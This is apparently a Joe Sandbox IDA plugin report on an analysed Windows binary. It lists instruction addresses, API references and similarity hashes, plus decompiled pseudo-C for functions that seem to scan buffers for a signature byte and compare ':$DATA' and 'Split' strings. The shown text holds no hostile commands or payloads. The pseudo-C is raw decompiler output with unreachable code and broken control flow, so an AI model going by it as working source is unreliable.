0x00405053
0x00000000
0x00000000
0x00405059
0x0040505e
0x00405061
0x00405064
0x00000000
0x00000000
0x0040506f
0x00405071
0x00000000
0x00000000
0x00405077
0x00405081
0x00405085
0x0040508f
0x00405094
0x0040509f
0x004050a4
0x004050a6
0x004050cb
0x004050cd
0x004050d2
0x004050d6
0x004050d8
0x00405118
0x0040511a
0x0040511f
0x00405122
0x00405129
0x00405124
0x00405124
0x00405124
0x00405130
0x00405133
0x00405136
0x0040513e
0x00405147
0x0040514c
0x00000000
0x0040514c
0x004050da
0x004050dd
0x004050e4
0x004050e7
0x004050eb
0x00000000
0x004050f0
0x004050df
0x004050e2
0x00000000
0x00000000
0x00000000
0x004050e2
0x004050ab
0x004050b4
0x004050bb
0x004050be
0x004050c7
0x00000000
0x004050c7
0x004050c0
0x004050c3
0x00000000
0x004050c3
0x00405021
0x00405023
0x00405026
0x00000000
0x00000000
0x0040502c
0x0040502f
0x00000000
0x00000000
0x00405037
0x0040503f
0x00405043
0x00405047
0x00000000
0x00405047
0x00405009
0x0040500d
0x00000000
0x00000000
0x00000000
0x00404fad
0x00404fad
0x00404fb3
0x00000000
0x00000000
0x00404fbc
0x00404fbe
0x00404fc1
0x004050f1
0x004050f6
0x004050fb
0x004050fd
0x00405100
0x00000000
0x00405100
0x00404fc7
0x00404fca
0x00000000
0x00000000
0x00404fd2
0x00404fda
0x00404fdd
0x00404fe2
0x00404fe9
0x00404fea
0x00404fed
0x00404fef
0x00404ff2
0x00404ff4
0x00404ff4
0x00404ff4
0x00404ff4
0x00404ff9
0x00404ff9
0x00000000
0x00404ff9
0x00404de1
0x00404de8
0x00404ded
0x00404df5
0x00404dfd
0x00404e01
0x00404e06
0x00404e09
0x00404e09
0x00404e0e
0x00404e14
0x00404e33
0x00404e33
0x00404e3b
0x00404e42
0x00404e45
0x00404e80
0x00404e85
0x00404e87
0x00404f7c
0x00000000
0x00404f82
0x00404e8d
0x00404e8d
0x00000000
0x00404e58
0x00404e5a
0x00404e62
0x00404e65
0x00404e6a
0x00404e6d
0x00404e70
0x00404e76
0x00404e76
0x00404e8f
0x00404e8f
0x00404e95
0x00404e99
0x00404e9b
0x00404ea5
0x00404ea9
0x00404eb1
0x00404eb5
0x00404eba
0x00404ec5
0x00404ed0
0x00000000
0x00000000
0x00404ed6
0x00404f00
0x00000000
0x00404f00
0x00404ee5
0x00404f0a
0x00404f0d
0x00404f10
0x00404f12
0x00404f15
0x00404f17
0x00404f1c
0x00404f1f
0x00404f1f
0x00404f17
0x00404f2a
0x00404f32
0x00404f36
0x00404f38
0x00404f3b
0x00404f3e
0x00404f40
0x00404f4b
0x00404f65
0x00405105
0x00405105
0x00405107
0x0040510d
0x00405115
0x00405115
0x00404eea
0x00404eee
0x00404ef7
0x00404ef7
0x00404f06
0x00000000
0x00404f06
0x00404e45

APIs

__EH_prolog.LIBCMT ref: 00404DB4
SetLastError.KERNEL32(00000002,?,?,?,:$DATA,?,00000000,?,?,00000001), ref: 00404F00
wcscmp.MSVCRT ref: 004050B4

Strings

:$DATA, xrefs: 00404E19, 00404E2B

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ErrorH_prologLastwcscmp
String ID: :$DATA
API String ID: 161073058-2587938151
Opcode ID: 5f020bb28cd8117265225efec81bdc0651470f94f3d0112356166a414e1d72bb
Instruction ID: da1b248e0d231fcc0c283d7306f0842e77f2967e3c74f92a20ef298db707ecaa
Opcode Fuzzy Hash: 5f020bb28cd8117265225efec81bdc0651470f94f3d0112356166a414e1d72bb
Instruction Fuzzy Hash: 8EB1D2719006059ACF24EFA5C841AEEBBB4EF54318F10813FE552772E2DB3D5A49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBB1, Relevance: 6.2, APIs: 4, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040EBB1(void* __ecx, void* __eflags) {
				signed int _t46;
				void* _t48;
				intOrPtr* _t50;
				signed int _t51;
				void* _t53;
				signed int _t56;
				intOrPtr* _t60;
				void* _t64;
				void* _t67;
				signed int _t73;
				signed int _t77;
				void* _t83;
				signed int _t88;
				signed int _t89;
				signed int _t93;
				void* _t95;
				signed int _t97;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;

				E00418D80(E0041A4C4, _t99);
				_t102 = _t101 - 0x1c;
				_t95 = __ecx;
				_t64 = __ecx + 0x50;
				_t46 = E00407B3A(__eflags, 0x20); // executed
				if(_t46 == 0) {
					if(E0040ED43(_t64) == 0) {
						_t88 =  *(_t99 + 0xc);
						__eflags = _t88;
						if(_t88 == 0) {
							L6:
							_push(0x8000); // executed
							_t48 = E004031DD(); // executed
							 *(_t99 - 0x10) = _t48;
							 *(_t99 - 0x18) = _t48;
							 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
							memcpy(_t48, _t64, 0x20);
							 *(_t99 - 0x20) =  *(_t99 - 0x20) & 0x00000000;
							_t104 = _t102 + 0x10;
							_t11 = _t99 - 0x1c;
							 *_t11 =  *(_t99 - 0x1c) & 0x00000000;
							__eflags =  *_t11;
							while(1) {
								__eflags = _t88;
								_t73 = 0x7fe0;
								if(_t88 == 0) {
									goto L11;
								}
								_t51 =  *_t88 -  *(_t99 - 0x20);
								__eflags = _t51;
								asm("sbb edx, [ebp-0x1c]");
								 *(_t99 - 0x24) =  *(_t88 + 4);
								if(_t51 != 0) {
									goto L11;
								} else {
									__eflags = _t51 - 0x7fe0;
									if(_t51 >= 0x7fe0) {
										goto L11;
									} else {
										__eflags = _t51;
										_t73 = _t51;
										if(_t51 == 0) {
											L27:
											_t97 = 1;
										} else {
											goto L11;
										}
									}
								}
								L30:
								E00403204(_t51,  *(_t99 - 0x10));
								_t46 = _t97;
								goto L31;
								L11:
								_t50 =  *((intOrPtr*)(_t99 + 8));
								_t89 = 0;
								 *(_t99 - 0x14) = 0;
								_t51 =  *((intOrPtr*)( *_t50 + 0xc))(_t50,  *(_t99 - 0x10) + 0x20, _t73, _t99 - 0x14);
								__eflags = _t51;
								if(_t51 != 0) {
									L29:
									_t97 = _t51;
								} else {
									_t77 =  *(_t99 - 0x14);
									__eflags = _t77;
									if(_t77 == 0) {
										goto L27;
									} else {
										while(1) {
											_t53 =  *(_t99 - 0x10);
											_t67 = _t53 + _t89 + 1;
											_t83 = _t53 + _t77;
											__eflags = _t67 - _t83;
											if(_t67 > _t83) {
												break;
											} else {
												goto L14;
											}
											while(1) {
												L14:
												__eflags =  *_t67 - 0x37;
												if( *_t67 == 0x37) {
													break;
												}
												__eflags =  *(_t67 + 1) - 0x37;
												if( *(_t67 + 1) == 0x37) {
													_t67 = _t67 + 1;
												} else {
													__eflags =  *((char*)(_t67 + 2)) - 0x37;
													if( *((char*)(_t67 + 2)) == 0x37) {
														_t67 = _t67 + 2;
													} else {
														__eflags =  *(_t67 + 3) - 0x37;
														if( *(_t67 + 3) == 0x37) {
															_t67 = _t67 + 3;
															__eflags = _t67;
														} else {
															_t67 = _t67 + 4;
															__eflags = _t67 - _t83;
															if(_t67 <= _t83) {
																continue;
															} else {
															}
														}
													}
												}
												break;
											}
											__eflags = _t67 - _t83;
											if(_t67 > _t83) {
												break;
											} else {
												_t89 = _t67 -  *(_t99 - 0x10);
												_t56 = E0040ED43(_t67);
												__eflags = _t56;
												if(_t56 != 0) {
													memcpy(_t95 + 0x50, _t67, 0x20);
													asm("adc eax, [ebp-0x1c]");
													 *((intOrPtr*)(_t95 + 0x40)) =  *((intOrPtr*)(_t95 + 0x40)) + _t89 +  *(_t99 - 0x20);
													asm("adc [esi+0x44], eax");
													_t60 =  *((intOrPtr*)(_t99 + 8));
													_t93 =  *((intOrPtr*)(_t95 + 0x40)) + 0x20;
													__eflags = _t93;
													asm("adc esi, ecx");
													_t51 =  *((intOrPtr*)( *_t60 + 0x10))(_t60, _t93,  *((intOrPtr*)(_t95 + 0x44)), 0, 0);
													goto L29;
												} else {
													_t77 =  *(_t99 - 0x14);
													continue;
												}
											}
											goto L30;
										}
										 *(_t99 - 0x20) =  *(_t99 - 0x20) + _t77;
										asm("adc dword [ebp-0x1c], 0x0");
										memmove(_t53, _t53 + _t77, 0x20);
										_t88 =  *(_t99 + 0xc);
										_t104 = _t104 + 0xc;
										continue;
									}
								}
								goto L30;
							}
						} else {
							__eflags =  *_t88 |  *(_t88 + 4);
							if(( *_t88 |  *(_t88 + 4)) != 0) {
								goto L6;
							} else {
								_t46 = 1;
							}
						}
					} else {
						_t46 = 0;
					}
				}
				L31:
				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
				return _t46;
			}

0x0040ebb6
0x0040ebbb
0x0040ebc0
0x0040ebc8
0x0040ebcd
0x0040ebd4
0x0040ebe3
0x0040ebec
0x0040ebef
0x0040ebf1
0x0040ec02
0x0040ec02
0x0040ec07
0x0040ec0c
0x0040ec0f
0x0040ec12
0x0040ec1a
0x0040ec1f
0x0040ec23
0x0040ec26
0x0040ec26
0x0040ec26
0x0040ec2a
0x0040ec2a
0x0040ec2c
0x0040ec31
0x00000000
0x00000000
0x0040ec38
0x0040ec38
0x0040ec3b
0x0040ec3e
0x0040ec41
0x00000000
0x0040ec43
0x0040ec43
0x0040ec45
0x00000000
0x0040ec47
0x0040ec47
0x0040ec49
0x0040ec4b
0x0040ece9
0x0040eceb
0x00000000
0x00000000
0x00000000
0x0040ec4b
0x0040ec45
0x0040ed27
0x0040ed2a
0x0040ed30
0x00000000
0x0040ec51
0x0040ec51
0x0040ec61
0x0040ec65
0x0040ec68
0x0040ec6b
0x0040ec6d
0x0040ed25
0x0040ed25
0x0040ec73
0x0040ec73
0x0040ec76
0x0040ec78
0x00000000
0x0040ec7a
0x0040ec7a
0x0040ec7a
0x0040ec7d
0x0040ec81
0x0040ec84
0x0040ec86
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ec88
0x0040ec88
0x0040ec88
0x0040ec8b
0x00000000
0x00000000
0x0040ec8d
0x0040ec91
0x0040eca8
0x0040ec93
0x0040ec93
0x0040ec97
0x0040ecac
0x0040ec99
0x0040ec99
0x0040ec9d
0x0040ecaf
0x0040ecaf
0x0040ec9f
0x0040ec9f
0x0040eca2
0x0040eca4
0x00000000
0x00000000
0x0040eca6
0x0040eca4
0x0040ec9d
0x0040ec97
0x00000000
0x0040ec91
0x0040ecb2
0x0040ecb4
0x00000000
0x0040ecb6
0x0040ecba
0x0040ecbd
0x0040ecc2
0x0040ecc4
0x0040ecf5
0x0040ed02
0x0040ed05
0x0040ed08
0x0040ed11
0x0040ed16
0x0040ed16
0x0040ed1c
0x0040ed22
0x00000000
0x0040ecc6
0x0040ecc6
0x00000000
0x0040ecc6
0x0040ecc4
0x00000000
0x0040ecb4
0x0040eccb
0x0040ecd0
0x0040ecd8
0x0040ecde
0x0040ece1
0x00000000
0x0040ece1
0x0040ec78
0x00000000
0x0040ec6d
0x0040ebf3
0x0040ebf5
0x0040ebf8
0x00000000
0x0040ebfa
0x0040ebfc
0x0040ebfc
0x0040ebf8
0x0040ebe5
0x0040ebe5
0x0040ebe5
0x0040ebe3
0x0040ed32
0x0040ed38
0x0040ed40

APIs

__EH_prolog.LIBCMT ref: 0040EBB6

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 72ff1a0eea2013cadeca599a52519994da2caadcde6afb1cc44e6be52f4a8b55
Instruction ID: c12524c289feaf3e84e46ecd753a7b8664c50a4f4eb467be383fba77f0e1be85
Opcode Fuzzy Hash: 72ff1a0eea2013cadeca599a52519994da2caadcde6afb1cc44e6be52f4a8b55
Instruction Fuzzy Hash: 8D51E071A042069BEB24DF56C885BAEB3B5FF44304F18493AE401B73C1D77DAD558B58

Uniqueness

Uniqueness Score: -1.00%

Function 004019F5, Relevance: 6.1, APIs: 4, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004019F5(void* __ecx, intOrPtr __edx, void* __eflags) {
				signed char** _t60;
				signed int _t64;
				char* _t65;
				void* _t70;
				intOrPtr _t72;
				void* _t73;
				void* _t74;
				void* _t79;
				char _t80;
				signed int _t85;
				signed int _t86;
				void* _t87;
				signed int _t97;
				int _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t87 = __ecx;
				E00418D80(E004194A4, _t104);
				E00418DB0(0x1024, __ecx);
				_t60 =  *(_t104 + 0xc);
				_t97 = 0;
				_t60[1] = 0;
				 *( *_t60) =  *( *_t60) & 0x00000000;
				 *(_t104 - 0x1c) =  *(_t104 - 0x1c) | 0xffffffff;
				 *((intOrPtr*)(_t104 - 0x30)) = __edx;
				 *((intOrPtr*)(_t104 - 4)) = 0;
				if(E004053B3(_t87) == 0) {
					L25:
					E00405298(_t104 - 0x1c);
					_t64 = 0;
				} else {
					 *((intOrPtr*)(_t104 - 0x14)) = 0;
					if( *((char*)(__edx)) != 0) {
						do {
							 *((intOrPtr*)(_t104 - 0x14)) =  *((intOrPtr*)(_t104 - 0x14)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t104 - 0x14)) + __edx)) != 0);
					}
					_t65 =  *((intOrPtr*)(_t104 + 8));
					 *((intOrPtr*)(_t104 - 0x18)) = _t97;
					if( *_t65 != 0) {
						do {
							 *((intOrPtr*)(_t104 - 0x18)) =  *((intOrPtr*)(_t104 - 0x18)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t104 - 0x18)) + _t65)) != 0);
					}
					_t102 = 0;
					 *(_t104 - 0xd) =  *(_t104 - 0xd) & 0x00000000;
					 *((intOrPtr*)(_t104 - 0x24)) = _t97;
					 *((intOrPtr*)(_t104 - 0x20)) = _t97;
					while(1) {
						L7:
						_t70 = E00405410(_t104 - 0x1c, _t104 + _t102 - 0x1030, 0x1000 - _t102, _t104 - 0x28); // executed
						if(_t70 == 0) {
							break;
						}
						_t72 =  *((intOrPtr*)(_t104 - 0x28));
						if(_t72 == _t97) {
							L24:
							_t85 = 1;
							goto L22;
						} else {
							_t103 = _t102 + _t72;
							_t86 = _t104 - 0x1030;
							while(1) {
								_t73 = _t103;
								if( *(_t104 - 0xd) != 0) {
								}
								L11:
								_t79 = _t73 -  *((intOrPtr*)(_t104 - 0x18));
								if(_t97 > _t79) {
									L19:
									_t102 = _t103 - _t97;
									 *((intOrPtr*)(_t104 - 0x24)) =  *((intOrPtr*)(_t104 - 0x24)) + _t97;
									asm("adc dword [ebp-0x20], 0x0");
									memmove(_t104 - 0x1030, _t104 + _t97 - 0x1030, _t102);
									_t106 = _t106 + 0xc;
									if( *((intOrPtr*)(_t104 - 0x20)) > 0 ||  *((intOrPtr*)(_t104 - 0x24)) > 0x100000) {
										_t85 = _t86 & 0xffffff00 | ( *(_t104 + 0xc))[1] == 0x00000000;
										L22:
										E00405298(_t104 - 0x1c);
										_t64 = _t85;
									} else {
										_t97 = 0;
										goto L7;
									}
								} else {
									_push( *((intOrPtr*)(_t104 - 0x18)));
									_push( *((intOrPtr*)(_t104 + 8)));
									_push(_t86);
									L00418DA0();
									_t106 = _t106 + 0xc;
									if(_t79 == 0) {
										goto L24;
									} else {
										_t80 =  *_t86;
										 *((char*)(_t104 - 0x2c)) = _t80;
										if(_t80 == 0) {
											goto L25;
										} else {
											E00401B7E( *(_t104 + 0xc),  *((intOrPtr*)(_t104 - 0x2c)));
											L15:
											_t97 = _t97 + 1;
											_t86 = _t86 + 1;
											while(1) {
												_t73 = _t103;
												if( *(_t104 - 0xd) != 0) {
												}
												goto L16;
											}
											goto L11;
										}
									}
								}
								goto L26;
								L16:
								_t74 = _t73 -  *((intOrPtr*)(_t104 - 0x14));
								if(_t97 > _t74) {
									goto L19;
								} else {
									_push( *((intOrPtr*)(_t104 - 0x14)));
									_push( *((intOrPtr*)(_t104 - 0x30)));
									_push(_t86);
									L00418DA0();
									_t106 = _t106 + 0xc;
									if(_t74 != 0) {
										goto L15;
									} else {
										_t97 = _t97 +  *((intOrPtr*)(_t104 - 0x14));
										_t86 = _t86 +  *((intOrPtr*)(_t104 - 0x14));
										 *(_t104 - 0xd) = 1;
										continue;
									}
									L27:
								}
								goto L26;
							}
						}
						goto L26;
					}
					_t85 = 0;
					goto L22;
				}
				L26:
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t64;
				goto L27;
			}

0x004019f5
0x004019fa
0x00401a04
0x00401a09
0x00401a0f
0x00401a11
0x00401a18
0x00401a1b
0x00401a1f
0x00401a26
0x00401a30
0x00401b63
0x00401b66
0x00401b6b
0x00401a36
0x00401a39
0x00401a3c
0x00401a3e
0x00401a3e
0x00401a44
0x00401a3e
0x00401a4a
0x00401a4d
0x00401a53
0x00401a55
0x00401a55
0x00401a5b
0x00401a55
0x00401a61
0x00401a63
0x00401a67
0x00401a6a
0x00401a71
0x00401a71
0x00401a88
0x00401a8f
0x00000000
0x00000000
0x00401a95
0x00401a9a
0x00401b5f
0x00401b5f
0x00000000
0x00401aa0
0x00401aa0
0x00401aa2
0x00401aa8
0x00401aac
0x00401aae
0x00401aae
0x00401ab0
0x00401ab0
0x00401ab5
0x00401b10
0x00401b10
0x00401b12
0x00401b24
0x00401b29
0x00401b2f
0x00401b36
0x00401b4c
0x00401b4f
0x00401b52
0x00401b57
0x00401a6f
0x00401a6f
0x00000000
0x00401a6f
0x00401ab7
0x00401ab7
0x00401aba
0x00401abd
0x00401abe
0x00401ac3
0x00401ac8
0x00000000
0x00401ace
0x00401ace
0x00401ad2
0x00401ad5
0x00000000
0x00401adb
0x00401ae1
0x00401ae6
0x00401ae6
0x00401ae7
0x00401aa8
0x00401aac
0x00401aae
0x00401aae
0x00000000
0x00401aae
0x00000000
0x00401aa8
0x00401ad5
0x00401ac8
0x00000000
0x00401aea
0x00401aea
0x00401aef
0x00000000
0x00401af1
0x00401af1
0x00401af4
0x00401af7
0x00401af8
0x00401afd
0x00401b02
0x00000000
0x00401b04
0x00401b04
0x00401b07
0x00401b0a
0x00000000
0x00401b0a
0x00000000
0x00401b02
0x00000000
0x00401aef
0x00401aa8
0x00000000
0x00401a9a
0x00401b5b
0x00000000
0x00401b5b
0x00401b6d
0x00401b73
0x00401b7b
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004019FA
memcmp.MSVCRT ref: 00401ABE
memcmp.MSVCRT ref: 00401AF8
memmove.MSVCRT ref: 00401B29

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: memcmp$H_prologmemmove
String ID:
API String ID: 1585842370-0
Opcode ID: 53a639813324c0e6f53735f609cf536863337ed91f2060eb649b985a43864c96
Instruction ID: 38dfcbe944138311f729fb0dfaf23ea4560b4517be3ec0a244e0583db9330822
Opcode Fuzzy Hash: 53a639813324c0e6f53735f609cf536863337ed91f2060eb649b985a43864c96
Instruction Fuzzy Hash: E241AC72D002499BCF11DFA4C840BEEBBB5AF45384F14416AE855772E2E3389A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC7, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040BCC7(void* __ecx) {
				intOrPtr _t39;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t43;
				intOrPtr* _t45;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t56;
				signed int* _t57;
				intOrPtr _t58;
				struct _CRITICAL_SECTION* _t65;
				signed int _t68;
				void* _t71;

				E00418D80(E0041A0B8, _t71);
				_t68 =  *(_t71 + 8);
				_t65 =  *((intOrPtr*)(_t68 + 8)) + 0x18;
				 *(_t71 - 0x10) = _t65;
				EnterCriticalSection(_t65);
				_t39 =  *((intOrPtr*)(_t68 + 8));
				_t50 =  *((intOrPtr*)(_t68 + 0x10));
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				_t58 =  *((intOrPtr*)(_t68 + 0x14));
				if(_t50 !=  *((intOrPtr*)(_t39 + 0x10)) || _t58 !=  *((intOrPtr*)(_t39 + 0x14))) {
					_t40 =  *((intOrPtr*)(_t39 + 8));
					_t41 =  *((intOrPtr*)( *_t40 + 0x10))(_t40, _t50, _t58, 0, 0, _t46);
					if(_t41 != 0) {
						goto L6;
					}
					_t43 =  *((intOrPtr*)(_t68 + 8));
					 *((intOrPtr*)(_t43 + 0x10)) =  *((intOrPtr*)(_t68 + 0x10));
					 *((intOrPtr*)(_t43 + 0x14)) =  *((intOrPtr*)(_t68 + 0x14));
					goto L4;
				} else {
					L4:
					 *(_t71 + 8) =  *(_t71 + 8) & 0x00000000;
					_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 8)) + 8));
					_t41 =  *((intOrPtr*)( *_t45 + 0xc))(_t45,  *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 0x10)), _t71 + 8);
					 *((intOrPtr*)(_t68 + 0x10)) =  *((intOrPtr*)(_t68 + 0x10)) +  *(_t71 + 8);
					_t56 =  *((intOrPtr*)(_t68 + 8));
					asm("adc dword [esi+0x14], 0x0");
					 *((intOrPtr*)(_t56 + 0x10)) =  *((intOrPtr*)(_t68 + 0x10));
					 *((intOrPtr*)(_t56 + 0x14)) =  *((intOrPtr*)(_t68 + 0x14));
					_t57 =  *(_t71 + 0x14);
					if(_t57 != 0) {
						 *_t57 =  *(_t71 + 8);
					}
					L6:
					LeaveCriticalSection(_t65);
					 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
					return _t41;
				}
			}

0x0040bccc
0x0040bcd3
0x0040bcda
0x0040bcde
0x0040bce1
0x0040bce7
0x0040bcea
0x0040bced
0x0040bcf1
0x0040bcf7
0x0040bcfe
0x0040bd0b
0x0040bd11
0x00000000
0x00000000
0x0040bd13
0x0040bd19
0x0040bd1f
0x00000000
0x0040bd22
0x0040bd22
0x0040bd25
0x0040bd2c
0x0040bd39
0x0040bd3f
0x0040bd42
0x0040bd45
0x0040bd4c
0x0040bd52
0x0040bd55
0x0040bd5a
0x0040bd5f
0x0040bd5f
0x0040bd61
0x0040bd64
0x0040bd71
0x0040bd79
0x0040bd79

APIs

__EH_prolog.LIBCMT ref: 0040BCCC
EnterCriticalSection.KERNEL32(?), ref: 0040BCE1
LeaveCriticalSection.KERNEL32(?), ref: 0040BD64

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CriticalSection$EnterH_prologLeave
String ID:
API String ID: 367238759-0
Opcode ID: 223f6b15eeea2771948690ca3a414ea69c75efdbba2d22d621701fa7eab4f037
Instruction ID: 6cfa36094df7fceee4fe309223ea3ff0f653a710c7f9d26e1c3ca6cc2b4dbde7
Opcode Fuzzy Hash: 223f6b15eeea2771948690ca3a414ea69c75efdbba2d22d621701fa7eab4f037
Instruction Fuzzy Hash: F82128756007009FDB28CF14D884A6BB7B5FF88714F10895EE8569B7A1C774E944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409DAD, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00409DAD(intOrPtr* __ecx) {
				intOrPtr* _t205;
				signed int _t206;
				signed int _t207;
				signed int _t213;
				void* _t214;
				signed int _t215;
				void* _t216;
				signed int _t218;
				intOrPtr* _t219;
				signed int _t226;
				intOrPtr* _t229;
				intOrPtr* _t230;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t242;
				signed int _t243;
				signed int _t245;
				intOrPtr* _t252;
				signed int _t256;
				void* _t257;
				signed int _t259;
				signed int _t275;
				intOrPtr* _t331;
				signed int _t334;
				void* _t336;

				E00418D80(E00419DC8, _t336);
				_t331 = __ecx;
				_t275 = 0;
				_t205 =  *__ecx;
				if(_t205 != 0) {
					 *((intOrPtr*)( *_t205 + 8))(_t205);
					 *__ecx = 0;
				}
				_t206 =  *(_t331 + 8);
				if(_t206 != _t275) {
					 *((intOrPtr*)( *_t206 + 8))(_t206);
					 *(_t331 + 8) = _t275;
				}
				_t207 =  *(_t331 + 0xc);
				if(_t207 != _t275) {
					 *((intOrPtr*)( *_t207 + 8))(_t207);
					 *(_t331 + 0xc) = _t275;
				}
				E00409944(_t331 + 0x10);
				 *(_t331 + 0x1c) =  *(_t331 + 0x1c) | 0xffffffff;
				 *(_t331 + 0xd0) = _t275;
				 *(_t331 + 0xd8) = _t275;
				 *(_t331 + 0xd4) = _t275;
				E0040429A(_t331 + 0x70);
				 *(_t336 - 4) = _t275;
				E0040368D(_t336 - 0x54);
				 *(_t336 - 4) = 1;
				if(E00403A5B(_t336 - 0x60, 0x2e) >= _t275) {
					E0040376E(_t336 - 0x54,  *((intOrPtr*)(_t336 - 0x60)) + 2 + _t211 * 2);
				}
				 *(_t336 - 0x48) = _t275;
				 *(_t336 - 0x44) = _t275;
				 *(_t336 - 0x40) = _t275;
				_t334 =  *(_t336 + 8);
				 *(_t336 - 4) = 2;
				 *(_t336 - 0x14) = _t275;
				_t213 =  *( *_t334 + 0xc);
				if(_t213 != _t275) {
					if(_t213 > 0xffffffff) {
						_t213 = _t213 | 0xffffffff;
					}
					_push(_t213);
					 *(_t336 - 0x14) = E004031DD();
				}
				_t214 = 0;
				 *(_t336 - 4) = 3;
				if( *( *_t334 + 0xc) <= _t275) {
					L14:
					if( *((intOrPtr*)(_t334 + 0x1d)) == _t275) {
						 *((intOrPtr*)(_t336 - 0x34)) = 0x800000;
						 *(_t336 - 0x30) = _t275;
					} else {
						 *((intOrPtr*)(_t336 - 0x34)) =  *((intOrPtr*)(_t334 + 0x20));
						 *(_t336 - 0x30) =  *(_t334 + 0x24);
					}
					_t215 =  *(_t334 + 8);
					 *(_t336 - 0x18) = _t215;
					if(_t215 < _t275) {
						_t216 =  *_t334;
						 *(_t336 - 0x10) = _t275;
						 *(_t336 + 8) = _t275;
						__eflags =  *((intOrPtr*)(_t216 + 0xc)) - _t275;
						if( *((intOrPtr*)(_t216 + 0xc)) <= _t275) {
							L28:
							__eflags =  *((intOrPtr*)(_t334 + 0x30)) - _t275;
							if( *((intOrPtr*)(_t334 + 0x30)) != _t275) {
								L32:
								 *(_t336 - 0x1c) =  *(_t336 - 0x44);
								_t218 =  *(_t336 - 0x10);
								__eflags = _t218 - _t275;
								if(_t218 != _t275) {
									 *(_t336 - 0x1c) = _t218;
								}
								goto L34;
							}
							_t221 = 1;
							__eflags =  *(_t336 - 0x10) - _t221;
							if( *(_t336 - 0x10) == _t221) {
								 *(_t336 - 0x44) = _t221;
								goto L32;
							}
							_t275 = 0x80004001;
							goto L67;
						} else {
							goto L20;
						}
						do {
							L20:
							__eflags =  *((intOrPtr*)(_t331 + 0xdf)) - _t275;
							 *(_t336 - 0x24) =  *( *((intOrPtr*)(_t216 + 8)) +  *(_t336 + 8) * 4);
							if( *((intOrPtr*)(_t331 + 0xdf)) != _t275) {
								L22:
								_t256 = E004032CE( *((intOrPtr*)( *(_t336 - 0x24) + 0xc)), "Split");
								__eflags = _t256;
								if(_t256 != 0) {
									goto L27;
								}
								L23:
								_t257 = E0040B70B( *((intOrPtr*)(_t334 + 0x2c)),  *(_t336 + 8), _t275,  *((intOrPtr*)( *((intOrPtr*)(_t334 + 0x2c)) + 4)));
								__eflags = _t257 - _t275;
								if(_t257 < _t275) {
									_t259 = E00409144( *(_t336 - 0x24), _t336 - 0x54);
									__eflags = _t259;
									if(_t259 < 0) {
										E004088FD(_t336 - 0x48,  *(_t336 + 8));
									} else {
										 *(_t336 - 0x10) =  *(_t336 - 0x10) + 1;
